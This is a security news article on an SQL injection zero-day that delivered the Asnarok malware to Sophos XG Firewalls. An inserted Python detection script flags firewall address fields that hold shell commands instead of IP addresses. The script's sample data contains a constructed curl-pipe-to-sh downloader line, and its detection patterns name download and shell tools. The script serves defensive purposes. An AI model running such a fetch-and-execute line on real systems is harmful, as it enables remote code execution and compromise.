Malware Delivered to Sophos Firewalls via Zero-Day Vulnerability

Cybersecurity company Sophos informed customers over the weekend that it has patched a zero-day vulnerability that has been exploited to deliver malware to its XG Firewall appliances.

Sophos said it learned of the attacks against its XG Firewall on April 22, after a suspicious field value was discovered in a device’s management interface. Its investigation revealed that attackers had been exploiting a previously unknown SQL injection vulnerability to compromise internet-exposed physical and virtual firewalls. Multiple customers were targeted.

According to the company, the attack was aimed at systems with the administration service or the user portal exposed to the internet. The attackers were apparently trying to exploit the security hole to download malware that would allow them to exfiltrate data from the firewall.

This data can include usernames and password hashes for the local device administrators, portal admins, and user accounts set up for remote access. The malware could have also gained access to information about the firewall, email addresses of accounts stored on the appliance, and information on IP address allocation permissions.

“Passwords associated with external authentication systems such as AD or LDAP are unaffected,” Sophos told customers.

Sophos began responding shortly after the attack started and on April 25 rolled out an SFOS hotfix that patches the SQL injection vulnerability. Once the hotfix is applied, it also tells users whether their firewall was compromised as part of this attack.

In a blog post published late on Sunday, Sophos revealed that the attacker exploited the SQL injection vulnerability to insert a one-line command into the firewall database. This command caused affected devices to download a Linux shell script named Install.sh from a remote server. The script then executed more SQL commands and dropped more files onto the virtual file system.

Other scripts deployed in the attack were designed to ensure persistence across device reboots and to create a backup channel.

“The Install.sh script, initially, ran a number of Postgres SQL commands to modify or zero out the values of certain tables in the database, one of which normally displays the administrative IP address of the device itself,” Sophos researchers explained. “It appears that this was an attempt to conceal the attack, but it backfired: On some appliances, the shell script’s activity resulted in the attacker’s own injected SQL command line being displayed on the user interface of the firewall’s administrative panel. In place of what should have been an address, it showed a line of shell commands.”
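The tell-tale described above was a database field that normally holds the appliance's own administrative IP address but instead showed a line of shell commands, or had been zeroed out. The following Python is an added example, not Sophos code, and does not reproduce the real SFOS schema: it shows the kind of sanity check that would surface such a field by reporting any supposed address value that does not parse as an IPv4/IPv6 address, noting whether it contains shell metacharacters or downloader tokens or is blank. The table and column names (tblconfig, name, value) and all sample rows, including the injected one-liner, are constructed for illustration.

```python
"""Flag configuration fields that should hold an IP address but do not.

Added example (not Sophos code). On the compromised appliances a field that
should have displayed the device's administrative IP address instead held a
line of shell commands, or had been zeroed out. This scans rows from a
config table and reports every address field whose value is not a plain
IPv4/IPv6 address, together with the reasons. The table, column names and
sample rows below are constructed; the real SFOS schema is not reproduced.
"""
import ipaddress
import re
import sqlite3

# Characters that never belong in an address field but do appear in a
# one-line downloader (command chaining, pipes, command substitution).
SHELL_METACHARS = re.compile(r"[;&|`$<>(){}]")
# Tokens typical of a fetch-and-execute one-liner or an embedded URL.
DOWNLOADER_TOKENS = re.compile(
    r"\b(?:curl|wget|sh|bash|chmod|nohup)\b|https?://", re.IGNORECASE
)


def classify_address_value(value):
    """Return the reasons a supposed address value is suspicious (empty list == clean)."""
    stripped = (value or "").strip()
    # "Zeroed out" values: empty string or a literal 0 (assumed representation).
    if stripped in ("", "0"):
        return ["blank_or_zeroed"]
    try:
        ipaddress.ip_address(stripped)
        return []
    except ValueError:
        pass
    reasons = ["not_an_ip_address"]
    if SHELL_METACHARS.search(stripped):
        reasons.append("shell_metacharacters")
    if DOWNLOADER_TOKENS.search(stripped):
        reasons.append("downloader_tokens")
    return reasons


def scan_table(conn, table, key_col, addr_col):
    """Scan table.addr_col; return [(key, value, reasons)] for every suspicious row.

    Table and column names are fixed by the caller's code, never taken from
    untrusted input, so interpolating them here is safe; row values are only
    ever read, never re-used to build SQL.
    """
    query = f'SELECT "{key_col}", "{addr_col}" FROM "{table}" ORDER BY rowid'
    findings = []
    for key, value in conn.execute(query):
        reasons = classify_address_value(value)
        if reasons:
            findings.append((key, value, reasons))
    return findings


def build_sample_db():
    """Constructed stand-in for an appliance config table (all names invented)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tblconfig (name TEXT, value TEXT)")
    conn.executemany(
        "INSERT INTO tblconfig (name, value) VALUES (?, ?)",
        [
            ("admin_ip", "192.0.2.10"),                            # healthy IPv4
            ("portal_ip", "2001:db8::1"),                          # healthy IPv6
            ("reporting_ip", ""),                                  # zeroed out
            ("backup_ip", "`curl http://198.51.100.7/x.sh | sh`"),  # injected one-liner (constructed)
        ],
    )
    return conn


if __name__ == "__main__":
    for key, value, reasons in scan_table(build_sample_db(), "tblconfig", "name", "value"):
        print(f"{key!r}: {value!r} -> {', '.join(reasons)}")
```

Run as a script it prints the two suspicious rows (the blank one and the one carrying shell commands); in practice you would point scan_table at an export of the real table and treat any non-address value in an address field as grounds for the password resets Sophos asked compromised customers to perform.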

Sophos has dubbed the malware involved in the attack Asnarok and attributed the operation to an “unknown adversary.”

“There was significant orchestration involved in the execution of the attack, using a chain of Linux shell scripts that eventually downloaded ELF binary executable malware compiled for a firewall operating system,” the company explained.

In the initial version of its advisory, Sophos said it had no evidence that the hackers accessed anything on the local networks behind the targeted firewalls, but that sentence was later removed without additional clarifications. The subsequent blog post does say that there is no evidence that the data collected from firewalls was actually exfiltrated.

The cybersecurity firm has published indicators of compromise (IoCs) and technical details about the attack. The company says customers whose firewalls have not been compromised do not need to take any action. Users whose firewalls are reported as compromised by this attack need to change the passwords on the device.

Related: Critical Flaw in Sophos Cyberoam Appliances Allows Remote Code Execution

Related: Sophos Patches Privilege Escalation Flaws in SafeGuard Products

Written By

Eduard Kovacs (@EduardKovacs) is a contributing editor at SecurityWeek. He worked as a high school IT teacher for two years before starting a career in journalism as Softpedia’s security news reporter. Eduard holds a bachelor’s degree in industrial informatics and a master’s degree in computer techniques applied in electrical engineering.
